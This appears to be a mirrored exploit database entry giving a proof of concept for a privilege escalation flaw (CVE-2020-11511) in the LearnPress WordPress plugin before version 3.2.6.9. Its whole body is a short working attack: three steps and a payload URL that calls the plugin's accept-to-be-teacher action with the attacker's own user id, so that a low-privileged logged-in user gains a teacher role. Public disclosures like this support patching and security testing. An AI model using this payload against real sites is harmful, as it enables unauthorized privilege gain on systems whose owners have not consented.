![$site['alt']](/img/irfan-toor-32-dark.jpeg)
Irfan TOOR WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
Author: nhattruong type: webapps platform: php port: date_added: 2021-07-19 date_updated: 2021-07-19 verified: 0 codes: tags: aliases: screenshot_url: application_url: raw file: 50138.txt
# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < 3.2.6.9 # References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd # CVE: CVE-2020-11511 POC: 1. Find out your user id 2. Login with your cred 3. Execute the payload http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id> # Done!